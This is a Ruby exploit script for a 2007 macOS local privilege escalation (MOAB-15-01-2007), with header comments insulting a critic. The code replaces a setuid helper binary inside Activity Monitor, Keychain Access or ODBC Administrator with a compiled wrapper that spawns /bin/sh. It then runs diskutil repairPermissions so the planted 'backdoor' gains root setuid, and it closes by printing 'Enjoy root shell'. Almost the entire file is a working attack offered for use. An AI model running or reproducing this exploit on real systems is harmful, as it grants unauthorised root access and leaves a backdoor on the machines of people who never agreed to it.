# !/usr/bin/ruby
# Exploit for MOAB-15-01-2007
# (c) 2006 LMH <lmh [at] info-pull.com>.
#
# Note: It's a generic exploit, you can use it over any binary writable which
# is set as root setuid by diskutil repair permissions. Simply change the path.
# Blame Apple for doing such a piece of **** and relying on flawed DAC.
#
#                   Line-noise: Jackass of the Week
# -------
# On Jan 14, 11:10 pm, "William A. Carrel" <willia...@carrel.org> wrote:
# > Works for me. I see yesterday's was an HFS+ panic.
# > > Is the info-pull/MoAB/MoKB site down, or is it just me that can't
# > > access it?
# Sorry, my fault. I blocked access to it at this end when they started
# distributing malware so that nobody downloaded anything accidentally. I
# can see it again now.
# 
# Kind regards,
# 
# Alastair.
# --------
#
# Hmm, false, it was the other way around:
#
# target     prot opt source               destination
# (...)
# DROP       all  --  ajhoughton.plus.com  anywhere
# (...)
#
# "LMH’s continued propensity for insults, which frankly I don’t particularly
# appreciate." -- http://alastairs-place.net/2007/01/how-childish/
#
# There's nothing wrong about embarrassing you for being an absurd liar.
# Live with it, and then post to your 'blog' as usual. Free Zealot Apple PR (tm).
#

require 'fileutils'

DISK_UTIL_COMMAND = "/usr/sbin/diskutil repairPermissions /"
AVAILABLE_TARGETS = [
                      "/Applications/Utilities/Activity Monitor.app/Contents/Resources/pmTool",
                      "/Applications/Utilities/Keychain Access.app/Contents/Resources/kcproxy",
                      "/Applications/Utilities/ODBC Administrator.app/Contents/Resources/iodbcadmintool"
                    ]

path_to_bin  = (AVAILABLE_TARGETS[ARGV[0].to_i] || AVAILABLE_TARGETS[0])
path_to_back = File.join("/tmp", File.basename(path_to_bin))

puts "++ Starting: #{path_to_bin}"
puts "++ Back-up:  #{path_to_back}"

if File.exists?(path_to_bin)
  unless File.exists?(path_to_back)
    FileUtils.cp(path_to_bin, path_to_back)
  end
end

puts "++ Compiling a shell wrapper at /tmp/o..."
WRAP_CODE = 'int main() { setuid(0); setgid(0); seteuid(0); system("/bin/sh -i"); }'
COMPILE   = "echo '#{WRAP_CODE}' > /tmp/t.c && gcc /tmp/t.c -s -o /tmp/o && rm -rf /tmp/t.c"
system(COMPILE)

puts "++ Placing backdoor..."
FileUtils.mv("/tmp/o", path_to_bin)
system(DISK_UTIL_COMMAND)

puts "++ Finished. Backup at #{path_to_back}."
puts "++ Repair with: mv '#{path_to_back}' '#{path_to_bin}'"
puts "++ Enjoy root shell."